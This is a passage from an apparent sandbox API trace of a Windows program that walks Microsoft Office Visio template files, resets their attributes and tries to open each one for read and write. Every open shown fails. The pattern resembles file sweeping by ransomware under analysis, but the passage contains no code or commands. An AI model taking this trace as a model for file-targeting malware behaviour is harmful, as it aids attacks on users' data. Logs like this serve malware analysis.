lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.904] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.904] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.904] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.904] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_M.VSS", dwFileAttributes=0x80) returned 0 [0137.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\causef_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.905] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.905] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.906] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_M.VST", dwFileAttributes=0x80) returned 0 [0137.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\causef_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.906] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.906] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.906] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_U.VSS", dwFileAttributes=0x80) returned 0 [0137.907] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\causef_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.907] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.907] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.907] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.907] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.907] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_U.VST", dwFileAttributes=0x80) returned 0 [0137.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CAUSEF_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\causef_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.908] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.908] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CEILPL_M.VST", dwFileAttributes=0x80) returned 0 [0137.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CEILPL_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ceilpl_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.908] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.908] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.908] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.908] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CEILPL_U.VST", dwFileAttributes=0x80) returned 0 [0137.909] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CEILPL_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ceilpl_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.909] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.909] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.909] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.909] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_M.VSS", dwFileAttributes=0x80) returned 0 [0137.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\chart_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.910] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.910] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.910] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.910] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.910] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_M.VST", dwFileAttributes=0x80) returned 0 [0137.910] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\chart_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.910] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.911] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_U.VSS", dwFileAttributes=0x80) returned 0 [0137.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\chart_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.911] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.911] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.911] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.911] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_U.VST", dwFileAttributes=0x80) returned 0 [0137.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CHART_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\chart_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.912] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.912] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.912] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_M.VSS", dwFileAttributes=0x80) returned 0 [0137.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comole_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.912] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.912] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.913] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_M.VST", dwFileAttributes=0x80) returned 0 [0137.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comole_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.913] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.913] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.913] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.913] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.913] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_U.VSS", dwFileAttributes=0x80) returned 0 [0137.914] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comole_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.914] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.914] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.914] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.914] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.914] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_U.VST", dwFileAttributes=0x80) returned 0 [0137.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMOLE_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comole_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.915] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPLN_M.VSS", dwFileAttributes=0x80) returned 0 [0137.915] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPLN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\compln_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.915] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.915] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.915] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.915] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPLN_U.VSS", dwFileAttributes=0x80) returned 0 [0137.916] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPLN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\compln_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.916] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.916] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.916] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.916] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.916] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPS_M.VSS", dwFileAttributes=0x80) returned 0 [0137.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPS_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comps_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.917] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.917] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.917] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.917] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPS_U.VSS", dwFileAttributes=0x80) returned 0 [0137.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\COMPS_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\comps_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.918] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.918] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONLOG_M.VST", dwFileAttributes=0x80) returned 0 [0137.918] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONLOG_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\conlog_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.918] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.918] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.918] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.918] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONLOG_U.VST", dwFileAttributes=0x80) returned 0 [0137.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONLOG_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\conlog_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.919] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.919] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.919] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.919] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.919] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONNEC_M.VSS", dwFileAttributes=0x80) returned 0 [0137.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONNEC_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\connec_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.920] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.920] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.920] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONNEC_U.VSS", dwFileAttributes=0x80) returned 0 [0137.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CONNEC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\connec_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.920] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.921] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CUBICL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CUBICL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\cubicl_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.922] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.922] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.922] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CUBICL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CUBICL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\cubicl_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.922] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.923] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_M.VSS", dwFileAttributes=0x80) returned 0 [0137.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datflo_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.924] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_M.VST", dwFileAttributes=0x80) returned 0 [0137.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datflo_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.924] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_U.VSS", dwFileAttributes=0x80) returned 0 [0137.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datflo_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.925] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.925] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_U.VST", dwFileAttributes=0x80) returned 0 [0137.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATFLO_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datflo_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.925] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.925] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATMOD_M.VST", dwFileAttributes=0x80) returned 0 [0137.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATMOD_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datmod_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.926] 